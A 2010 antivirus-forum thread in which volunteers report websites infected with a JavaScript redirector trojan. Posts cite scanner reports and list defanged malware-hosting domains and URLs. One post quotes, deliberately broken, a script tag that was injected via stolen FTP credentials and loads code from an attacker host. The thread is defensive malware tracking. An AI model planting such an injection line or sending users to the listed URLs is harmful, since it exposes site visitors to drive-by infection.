Author Topic: Source of infection...  (Read 13551 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Source of infection...
« on: May 26, 2010, 10:18:12 PM »
Hi malware fighters,

This following site is a redirect for infection of the site mentioned below: http://www.UnmaskParasites.com/security-report/?page=n9uo.com
403. Forbidden

http://safeweb.norton.com/report/show?url=grantsalert.com%2F&x=10&y=8
What is there: Total threats on this site:  38 all instances of Trojan.Malscript!html
Of the 105 pages we tested on the site over the past 90 days, 88 pages resulted in malicious software being downloaded and installed without user consent, and the last time suspicious content was found on this site was on 2010-05-13.

Malicious software includes 91 scripting exploits. Successful infection resulted in an average of 2 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including n9uo*com/, sio3*cn/.
See: http://safeweb.norton.com/report/show?url=sio3.cn&x=0&y=0
http://jsunpack.jeek.org/dec/go?report=61cfc9179bfe18905d4daa6a25cac414df04c50c

1 domain appear to be functioning as intermediaries for distributing malware to visitors of this site, including holeinone*com.tw/,

polonus
     
   
« Last Edit: May 26, 2010, 10:27:25 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #1 on: June 15, 2010, 12:33:54 AM »
Hi malware fighters,

Similar malcode also detected here:

Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/kmartemploymentapplications.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/americanpageanttest.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/taperfadehaircuts.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/dibujosdepreciousmomentsparapintar.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/mydisholivegardennetwork.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/graffitidrawingletter.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofeastcoastryders.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofbraids.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/trillfamadioslyrics.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/myspaceoverlayeditors.html\\

Description here: htxp://traversecode.com/2009/12/29/trojan-malscripthtml/  (Is flagged by avast shield)

Avast detects this as: JS:Redirector-B (trj)

and an additional suspicious link found here: sexfunbeach.com suspicious ↗  - displaying 1 of 1

    * <Script> link - htxp://sexfunbeach.com/blogs/moms/wp-content/plugins/index.php
    Malicious software includes 42 exploit(s), 19 trojan(s), 6 scripting exploit(s).

    Malicious software is hosted on 3 domains, including traffloads.in/, asfirey.net/, gumblar.cn/.

    This site was hosted on 1 network(s) including AS6428 (CDM).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past sexfunbeach.com appeared to function as an intermediary for the infection of 6 sites including savemyporn.com/, siscon.com.br/, smutboxxx.com/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 38 domain(s), including savemyporn.com/, smutboxxx.com/, sp-plan.co.jp/.

The nature of the content of the sites are a guarantee almost for added malware,
so stay away from/clear of pr0n sites,


polonus
   

  
« Last Edit: June 15, 2010, 12:39:00 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #3 on: June 15, 2010, 06:35:55 PM »
Another site with this malware found:
#

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/
#

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/index.html

Blocked by finjan: see the alert given attached/ShowBlock.aspx?transid=4C16F4ED

polonus
« Last Edit: June 15, 2010, 06:43:51 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37596
  • Not a avast user

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #5 on: June 16, 2010, 05:04:35 PM »
Hi malware fighters,

Another one found here:
Threat Name:    Trojan.Malscript!html
Location:    hxtp://www.kindergarten-zielstrasse.de/
finjan found: JS/Redirector-u aka JS/Dropper  aka Trojan-Downloader.JS.Pegel.ac A

This does not find it: http://wepawet.iseclab.org/view.php?hash=f7f4353f6be53dfe63e3a2cf00b0b46e&t=1276699724&type=js
But what is: htxp://bestdarkstar.info:8080/google.com/imeem.com/ign.com.php   NXDOMAIN   application/x-empty
A known Joomla exploit and appearing in this blocklist: http://doc.emergingthreats.net/pub/Main/HoneywallSamples/hosts   
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #6 on: June 16, 2010, 08:16:37 PM »
Hi malware fighters,

And another one here:
labradory_krakow.republika.pl
Domain Hash    ad873cf7c1d8d47dbdacfa4b1815def1
IP Address    213.180.128.160
IP Hostname    gwiazdka.republika.pl
IP Country    PL (Poland)
AS Number    12990
AS Name    ONET-PL-AS1 Onet.pl portal network
Detections    4 / 18 (22 %)
Status    DANGEROUS
Threat Name:      Trojan.Malscript!html
Location:    htxp://labradory_krakow.republika.pl/
2 suspicious inline scripts found.
Moreover, Google currently lists this page as suspicious*
    Malicious software includes 2 exploits, 1 scripting exploits, 1 trojan - Troj/Iframe/DY
HTML/Crypted.Gen aka JS/Redir.AQ
Successful infection resulted in an average of 1 new process on the target machine.

    Malicious software is hosted on 7 domains, including searchfunes.org/, mobi-print.com/, adingurj.com/.

    2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including scaraori.com/, eplarine.com/.

    This site was hosted on 1 network(s) including AS5617 (Polish Telecom).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past months labradory_krakow.republika.pl appeared to function as an intermediary for the infection of 3 sites including mojpupil.pl/, labrador.toplista.pl/, hodowle.top-100.pl/,
also see WOT: http://www.mywot.com/en/scorecard/labrador.toplista.pl

Read up about the code shown as an attached image:
http://stackoverflow.com/questions/1224670/what-is-the-advantage-of-using-unescape-on-document-write-to-load-javacript

polonus
« Last Edit: June 16, 2010, 08:35:05 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37596
  • Not a avast user

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #8 on: June 16, 2010, 10:37:30 PM »
Hi Pondus,

According to the second results, avast need detection there..
But according to the statistics here, avast detection rate for the malware should be 38%:
http://lists.clean-mx.com/clean-mx/md5.php?F_Prot=JS/Redir.AQ

pol
« Last Edit: June 16, 2010, 10:44:16 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #9 on: June 17, 2010, 12:31:58 AM »
Hi malware fighters,

And what do you think 61 instances of it here: http://www.browserdefender.com/site/fear-crew-team.yoyo.pl/

Same trojan,

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #10 on: June 19, 2010, 11:16:17 PM »
Hi Pondus,

Now a Norwegian site that has this infection:
webactive24*at
Domain Hash    b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address    213.188.130.108
IP Hostname    linuxnl-www.active24.nl
IP Country    NO (Norway)
AS Number    12994
AS Name    Active ISP AS
Detections    7 / 19 (37 %)
Status    DANGEROUS

Virus
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.webactive24.at/

Drive-By Downloads
Threat Name:    Trojan.Malscript!html
File name:    c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location:    htxp://webactive24.at/

See the attached image of the malcode...
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru

polonus

   
« Last Edit: June 19, 2010, 11:20:00 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37596
  • Not a avast user
Re: Source of infection...
« Reply #11 on: June 19, 2010, 11:47:34 PM »
VirusTotal - webactive24.at.htm - 28/41   ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902
« Last Edit: July 09, 2010, 12:28:46 AM by Pondus »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #12 on: June 27, 2010, 03:03:09 PM »
Hi another site with malscript infection found, this time Czech site:
   
Threat Name:    Trojan.Malscript!html
Location:   hxtp://www.krach-cz.cz/index.htm
Analysis:   htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but is infected with Troj/JSRedir-AK
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location:     hxtp://www.krach-cz.cz/
Our avast av detects JS-Illredir-H here,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #13 on: June 30, 2010, 01:54:19 PM »
Howdy malware fighters,

Here a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10

sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name:    Bloodhound.Exploit.292
Location:    htxp://sorydory.russellhowe.com:8080/Applet1.html

aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
hreat Name:      Bloodhound.Exploit.292
Location:    htxp://aospfpgy.dogplaystation.com:8080/Applet1.html

kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name:      Trojan.Malscript!html
Location:    hxtp://kollinsoy.skyefenton.com:8080/HDMI.js

temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name:    Trojan.Malscript!html
Location:    htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf


The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:
Code: [Select]
^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ code broken by me, pol

polonus
« Last Edit: June 30, 2010, 06:02:25 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33926
  • malware fighter
Re: Source of infection...
« Reply #14 on: July 08, 2010, 10:29:02 PM »
Hi malware fighters,

Another one:  Threats found: 1
Here is a complete list:
Threat Name:    Trojan.Malscript!html
Location:    htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits

    This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sitex including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!